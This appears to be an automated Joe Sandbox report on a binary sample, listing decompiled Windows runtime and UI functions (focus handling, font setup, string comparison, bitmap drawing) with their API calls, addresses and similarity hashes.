0x00415422
0x004153d6
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 004153DC
SetActiveWindow.USER32(?), ref: 004153EE
SendMessageA.USER32(?,00000112,?,?), ref: 00415404
IsWindow.USER32(?), ref: 00415411
SetActiveWindow.USER32(?), ref: 00415418
IsWindow.USER32(?), ref: 0041541D
SetFocus.USER32(?), ref: 00415427

Strings

u, xrefs: 00415432

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction ID: 08e7680b70c01f71feb78b7b04bbbad669989e92906b740bb6337346909a31ec
Opcode Fuzzy Hash: 8c48182a88e980f122088be52c97c01ef4bfbd378e51f1298f5237cc586278ca
Instruction Fuzzy Hash: D2110372600619EBDB346F25ED48AEA7B64EB80315F448037E901962A1D77CDDC2DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004170E7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004170E7(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E00416FCD(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

0x004170f8
0x004170fb
0x004170fc
0x00417103
0x00417107
0x00417111
0x00417120
0x00417124
0x0041712d
0x0041712f
0x00417134
0x00417138
0x00417138
0x00417153
0x00417155
0x00417155
0x0041715b
0x00417160
0x00417162
0x00417162
0x00417175
0x00417175
0x0041710b
0x0041710f
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 00417103
GetStockObject.GDI32(0000000D), ref: 0041710B
GetObjectA.GDI32(00000000,0000003C,?), ref: 00417118
GetDC.USER32(00000000), ref: 00417127
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041713E
MulDiv.KERNEL32(?,00000048,00000000), ref: 0041714A
ReleaseDC.USER32 ref: 00417155

Strings

System, xrefs: 004170FC, 0041716B

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction ID: aedc63dc14c356acfddf8dbf112d5b7e9114f9d10090a13ed9499bd610fb2d75
Opcode Fuzzy Hash: 88a62be2883dc778bffe4279af9f13e5efe5524b205705b3f86c503938333c71
Instruction Fuzzy Hash: 2F113371B00318BBEB209BA19C45FAF7B78FB05790F404026FA05E62C0D7749D42CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AC99, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E0040AC99(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;
				void* _t17;

				_t14 = 0;
				_t17 =  *0x439fd0 - _t14; // 0x0
				if(_t17 != 0) {
					L4:
					_t4 =  *0x439fd4; // 0x0
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x439fd8; // 0x0
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x439fd0(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x439fd0 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x439fd4 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x439fd8 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x0040ac9a
0x0040ac9c
0x0040aca4
0x0040ace8
0x0040ace8
0x0040acef
0x0040acf3
0x0040acf7
0x0040acf9
0x0040ad00
0x0040ad05
0x0040ad05
0x0040ad00
0x0040acf7
0x00000000
0x0040ad14
0x0040acb1
0x0040acb5
0x0040ad1e
0x00000000
0x0040ad1e
0x0040acc3
0x0040acc7
0x0040accc
0x00000000
0x0040acce
0x0040acdc
0x0040ace3
0x00000000
0x0040ace3

APIs

LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00409A35,?,Microsoft Visual C++ Runtime Library,00012010,?,0042F53C,?,0042F58C,?,?,?,Runtime Error!Program: ), ref: 0040ACAB
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0040ACC3
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0040ACD4
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040ACE1

Strings

MessageBoxA, xrefs: 0040ACBD
user32.dll, xrefs: 0040ACA6
GetLastActivePopup, xrefs: 0040ACD6
GetActiveWindow, xrefs: 0040ACCE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
API String ID: 2238633743-4044615076
Opcode ID: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction ID: a9e059596031861d50e68843925f1eff39380896684ae965336398d5bbd15c8e
Opcode Fuzzy Hash: 1c5d333bfefa196ee41cc629c286ab9d53157f6c4e3a187cce04e0c17d5edf39
Instruction Fuzzy Hash: 42017131300311AFC7109FB4AC84A2B7BE9EE88791758103BE500E22F5DBB89C15DB6D

Uniqueness

Uniqueness Score: -1.00%

Function 004160E6, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E004160E6(signed short _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed short _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

0x004160e8
0x004160f6
0x004160f8
0x004160fe
0x00416102
0x0041615a
0x00416104
0x0041610a
0x0041610c
0x00416114
0x00416131
0x00416139
0x0041613b
0x00416141
0x00416143
0x00416149
0x00416149
0x00416141
0x00416116
0x00416125
0x00416127
0x0041612d
0x0041612d
0x00416125
0x0041614f
0x00000000
0x00416155

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,004163E0,00000000,00020000,?,?,00000000), ref: 004160EF
LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 004160F8
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0041610C
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416127
#17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 00416143
FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00411E7A,00000010,00000000), ref: 0041614F

Strings

COMCTL32.DLL, xrefs: 004160E8, 004160EE, 004160F5
InitCommonControlsEx, xrefs: 00416104

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction ID: 81bca5f6391c8e8793c086ec2d57317fbfa520992b7089d48771000b14303d3d
Opcode Fuzzy Hash: e643cccf137e1cae2860d0c7a901f21b2a575cf028b437239449ca769040a35c
Instruction Fuzzy Hash: B6F0A436704322A783229F64ED4896F73A9EF947627460436F841E3211DF28DC4687AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD71, Relevance: 13.7, APIs: 9, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BD71(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				int _v36;
				short* _v40;
				short* _v44;
				char _v58;
				struct _cpinfo _v64;
				void* _v80;
				int _t65;
				int _t66;
				int _t69;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t86;
				int _t87;
				int _t88;
				void* _t96;
				char _t99;
				char _t101;
				intOrPtr _t104;
				intOrPtr _t105;
				int _t107;
				short* _t109;
				int _t111;
				int _t114;
				intOrPtr _t115;
				short* _t116;
				int _t118;

				_push(0xffffffff);
				_push(0x42f6e8);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t115;
				_t116 = _t115 - 0x30;
				_v28 = _t116;
				_t118 =  *0x43a068; // 0x0
				_t107 = 1;
				if(_t118 != 0) {
					L5:
					_t111 = _a16;
					if(_t111 > 0) {
						_t88 = E0040BFEE(_a12, _t111);
						_pop(_t96);
						_t111 = _t88;
						_a16 = _t111;
					}
					if(_a24 > 0) {
						_t87 = E0040BFEE(_a20, _a24);
						_pop(_t96);
						_a24 = _t87;
					}
					_t65 =  *0x43a068; // 0x0
					if(_t65 != 2) {
						if(_t65 != _t107) {
							goto L48;
						} else {
							if(_a28 == 0) {
								_t86 =  *0x439efc; // 0x0
								_a28 = _t86;
							}
							if(_t111 == 0 || _a24 == 0) {
								if(_t111 != _a24) {
									if(_a24 <= _t107) {
										if(_t111 > _t107) {
											L30:
											_push(3);
											goto L18;
										} else {
											if(GetCPInfo(_a28,  &_v64) == 0) {
												goto L48;
											} else {
												if(_t111 <= 0) {
													if(_a24 <= 0) {
														goto L39;
													} else {
														if(_v64 >= 2) {
															_t82 =  &_v58;
															if(_v58 != 0) {
																while(1) {
																	_t104 =  *((intOrPtr*)(_t82 + 1));
																	if(_t104 == 0) {
																		goto L20;
																	}
																	_t99 =  *_a20;
																	if(_t99 <  *_t82 || _t99 > _t104) {
																		_t82 = _t82 + 2;
																		if( *_t82 != 0) {
																			continue;
																		} else {
																			goto L20;
																		}
																	} else {
																		goto L17;
																	}
																	goto L49;
																}
															}
														}
														goto L20;
													}
												} else {
													if(_v64 >= 2) {
														_t84 =  &_v58;
														if(_v58 != 0) {
															while(1) {
																_t105 =  *((intOrPtr*)(_t84 + 1));
																if(_t105 == 0) {
																	goto L30;
																}
																_t101 =  *_a12;
																if(_t101 <  *_t84 || _t101 > _t105) {
																	_t84 = _t84 + 2;
																	if( *_t84 != 0) {
																		continue;
																	} else {
																		goto L30;
																	}
																} else {
																	goto L17;
																}
																goto L50;
															}
														}
													}
													goto L30;
													L50:
												}
											}
										}
									} else {
										L20:
										_t66 = _t107;
									}
								} else {
									L17:
									_push(2);
									L18:
									_pop(_t66);
								}
							} else {
								L39:
								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
								_v32 = _t69;
								if(_t69 == 0) {
									goto L48;
								} else {
									_v8 = 0;
									E00406830(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
									_v28 = _t116;
									_v40 = _t116;
									_v8 = _v8 | 0xffffffff;
									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
										goto L48;
									} else {
										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
										_v36 = _t114;
										if(_t114 == 0) {
											goto L48;
										} else {
											_v8 = _t107;
											E00406830(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
											_v28 = _t116;
											_t109 = _t116;
											_v44 = _t109;
											_v8 = _v8 | 0xffffffff;
											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
												goto L48;
											} else {
												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
											}
										}
									}
								}
							}
						}
					} else {
						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
					}
				} else {
					if(CompareStringW(0, 0, 0x42f5cc, _t107, 0x42f5cc, _t107) == 0) {
						if(CompareStringA(0, 0, 0x42f5c8, _t107, 0x42f5c8, _t107) == 0) {
							L48:
							_t66 = 0;
						} else {
							 *0x43a068 = 2;
							goto L5;
						}
					} else {
						 *0x43a068 = _t107;
						goto L5;
					}
				}
				L49:
				 *[fs:0x0] = _v20;
				return _t66;
				goto L50;
			}

0x0040bd74
0x0040bd76
0x0040bd7b
0x0040bd86
0x0040bd87
0x0040bd8e
0x0040bd94
0x0040bd99
0x0040bda1
0x0040bda2
0x0040bde4
0x0040bde4
0x0040bde9
0x0040bdef
0x0040bdf5
0x0040bdf6
0x0040bdf8
0x0040bdf8
0x0040bdfe
0x0040be06
0x0040be0c
0x0040be0d
0x0040be0d
0x0040be10
0x0040be18
0x0040be37
0x00000000
0x0040be3d
0x0040be40
0x0040be42
0x0040be47
0x0040be47
0x0040be4c
0x0040be5a
0x0040be67
0x0040be72
0x0040beb5
0x0040beb5
0x00000000
0x0040be74
0x0040be83
0x00000000
0x0040be89
0x0040be8b
0x0040bebc
0x00000000
0x0040bebe
0x0040bec2
0x0040bec4
0x0040beca
0x0040becc
0x0040becc
0x0040bed1
0x00000000
0x00000000
0x0040bed6
0x0040beda
0x0040bee5
0x0040bee8
0x00000000
0x0040beea
0x00000000
0x0040beea
0x00000000
0x00000000
0x00000000
0x00000000
0x0040beda
0x0040becc
0x0040beca
0x00000000
0x0040bec2
0x0040be8d
0x0040be91
0x0040be93
0x0040be99
0x0040be9b
0x0040be9b
0x0040bea0
0x00000000
0x00000000
0x0040bea5
0x0040bea9
0x0040beb0
0x0040beb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040bea9
0x0040be9b
0x0040be99
0x00000000
0x00000000
0x0040be91
0x0040be8b
0x0040be83
0x0040be69
0x0040be69
0x0040be69
0x0040be69
0x0040be5c
0x0040be5c
0x0040be5c
0x0040be5e
0x0040be5e
0x0040be5e
0x0040beef
0x0040beef
0x0040befa
0x0040bf00
0x0040bf05
0x00000000
0x0040bf0b
0x0040bf0b
0x0040bf15
0x0040bf1a
0x0040bf1f
0x0040bf22
0x0040bf41
0x00000000
0x0040bf61
0x0040bf70
0x0040bf72
0x0040bf77
0x00000000
0x0040bf79
0x0040bf79
0x0040bf84
0x0040bf89
0x0040bf8c
0x0040bf8e
0x0040bf91
0x0040bfab
0x00000000
0x0040bfc4
0x0040bfd2
0x0040bfd2
0x0040bfab
0x0040bf77
0x0040bf41
0x0040bf05
0x0040be4c
0x0040be1a
0x0040be2a
0x0040be2a
0x0040bda4
0x0040bdb7
0x0040bdd4
0x0040bfda
0x0040bfda
0x0040bdda
0x0040bdda
0x00000000
0x0040bdda
0x0040bdb9
0x0040bdb9
0x00000000
0x0040bdb9
0x0040bdb7
0x0040bfdc
0x0040bfe2
0x0040bfed
0x00000000

APIs

CompareStringW.KERNEL32(00000000,00000000,0042F5CC,00000001,0042F5CC,00000001,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BDAF
CompareStringA.KERNEL32(00000000,00000000,0042F5C8,00000001,0042F5C8,00000001,?,0040A577), ref: 0040BDCC
CompareStringA.KERNEL32(?,?,00000000,0040A577,?,0000000B,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B), ref: 0040BE2A
GetCPInfo.KERNEL32(0000000B,00000000,00000000,02320E6C,00408FB5,0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577), ref: 0040BE7B
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,0000000B,00000000,00000000,?,0040A577), ref: 0040BEFA
MultiByteToWideChar.KERNEL32(?,00000001,00000000,0000000B,?,?,?,0040A577), ref: 0040BF5B
MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000,?,0040A577), ref: 0040BF6E
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,?,00000000,?,0040A577), ref: 0040BFBA
CompareStringW.KERNEL32(?,?,00000000,00000000,?,00000000,?,00000000,?,0040A577), ref: 0040BFD2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide$Info
String ID:
API String ID: 1651298574-0
Opcode ID: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction ID: 15593673328f6da1faa78daf279323c0e4ae83b25398234663969b267ace6320
Opcode Fuzzy Hash: 299655132c169d1a6a538a860ebc1a291665f2f6c94a1d5cf859f72052921b9d
Instruction Fuzzy Hash: 3971783290024AAFDF219F54DC859EB7BBAEB05344F14413BFA51B22A0D7398851DBED

Uniqueness

Uniqueness Score: -1.00%

Function 00409DEA, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00409DEA(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x42f5d0);
				_push(E00409800);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x439ee0; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0040BFEE(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x439ee0; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x439efc; // 0x0
								_a28 = _t82;
							}
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E00406830(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E00406830(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					if(LCMapStringW(0, 0x100, 0x42f5cc, _t90, ??, ??) == 0) {
						if(LCMapStringA(0, 0x100, 0x42f5c8, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x439ee0 = 2;
							goto L5;
						}
					} else {
						 *0x439ee0 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

0x00409ded
0x00409def
0x00409df4
0x00409dff
0x00409e00
0x00409e07
0x00409e0d
0x00409e12
0x00409e18
0x00409e60
0x00409e63
0x00409e6b
0x00409e71
0x00409e72
0x00409e72
0x00409e75
0x00409e7d
0x00409e9f
0x00000000
0x00409ea5
0x00409ea8
0x00409eaa
0x00409eaf
0x00409eaf
0x00409ebf
0x00409ecf
0x00409ed1
0x00409ed6
0x00000000
0x00409edc
0x00409edc
0x00409ee7
0x00409eec
0x00409ef1
0x00409ef4
0x00409f10
0x00000000
0x00409f2b
0x00409f3d
0x00409f3f
0x00409f44
0x00000000
0x00409f46
0x00409f4a
0x00409f8c
0x00409f9b
0x00409fa0
0x00409fa3
0x00409fa5
0x00409fa8
0x00409fc2
0x00000000
0x00409fdc
0x00409fdf
0x00409fe0
0x00409fe1
0x00409fe7
0x00409fea
0x00409fe3
0x00409fe3
0x00409fe4
0x00409fe4
0x00409ffd
0x0040a001
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a001
0x00409f4c
0x00409f4f
0x0040a007
0x0040a007
0x00000000
0x00000000
0x00000000
0x00409f4f
0x00409f4a
0x00409f44
0x00409f10
0x00409ed6
0x00409e7f
0x00409e91
0x00409e91
0x00409e1a
0x00409e1a
0x00409e1b
0x00409e1e
0x00409e34
0x00409e50
0x00409f78
0x00409f78
0x00409e56
0x00409e56
0x00000000
0x00409e56
0x00409e36
0x00409e36
0x00000000
0x00409e36
0x00409e34
0x00409f80
0x00409f8b

APIs

LCMapStringW.KERNEL32(00000000,00000100,0042F5CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E2C
LCMapStringA.KERNEL32(00000000,00000100,0042F5C8,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E48
LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409E91
MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 00409EC9
MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F21
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F37
LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409F6A
LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 00409FD2

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: String$ByteCharMultiWide
String ID:
API String ID: 352835431-0
Opcode ID: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction ID: 2f12d8ec06d9f8176a5bc05fe246616eea55ae1664675450d96905dac16d2820
Opcode Fuzzy Hash: 6b965e39d78a5d0b96a2fafe8855910c976ca46044e99100e6440c906be38713
Instruction Fuzzy Hash: EA515D3190020ABBCF218F54CC49EEF7BB5FB45794F10412AF915A22E1D3399D61DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404577, Relevance: 13.6, APIs: 9, Instructions: 135
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404577(struct HDC__* _a4, int _a8, int _a12, struct HDC__* _a16, int _a20, int _a24, signed int _a28, int _a32, intOrPtr _a36, signed int _a40) {
				struct HDC__* _v8;
				int _v12;
				struct HBITMAP__* _v16;
				void* _t135;

				_v8 = CreateCompatibleDC(_a16);
				_v16 = CreateCompatibleBitmap(_a16, _a28, _a32);
				SelectObject(_v8, _v16);
				BitBlt(_v8, 0, 0, _a28, _a32, _a16, _a20, _a24, 0xcc0020);
				_v12 = 0;
				while(1) {
					asm("cdq");
					if(_v12 >= _a28 / _a40 + 1) {
						break;
					}
					StretchBlt(_v8, _a28 - (_v12 + 1) * _a40, 0, (_v12 + 1) * _a40, _a32, _a4, _a8, _a12, _a28, _a32, 0xcc0020);
					BitBlt(_a16, _a20 + _a28 - (_v12 + 1) * _a40, _a24, (_v12 + 1) * _a40, _a32, _v8, _a28 - (_v12 + 1) * _a40, 0, 0xcc0020);
					E0040381D(_a36);
					_t135 = _t135 + 4;
					_v12 = _v12 + 1;
				}
				BitBlt(_a16, _a20, _a24, _a28, _a32, _a4, _a8, _a12, 0xcc0020);
				DeleteObject(_v16);
				DeleteDC(_v8);
				return 1;
			}

0x00404587
0x0040459c
0x004045a7
0x004045ce
0x004045d4
0x004045e6
0x004045e9
0x004045f3
0x00000000
0x00000000
0x00404637
0x00404682
0x0040468c
0x00404691
0x004045e3
0x004045e3
0x004046be
0x004046c8
0x004046d2
0x004046dd

APIs

CreateCompatibleDC.GDI32(?), ref: 00404581
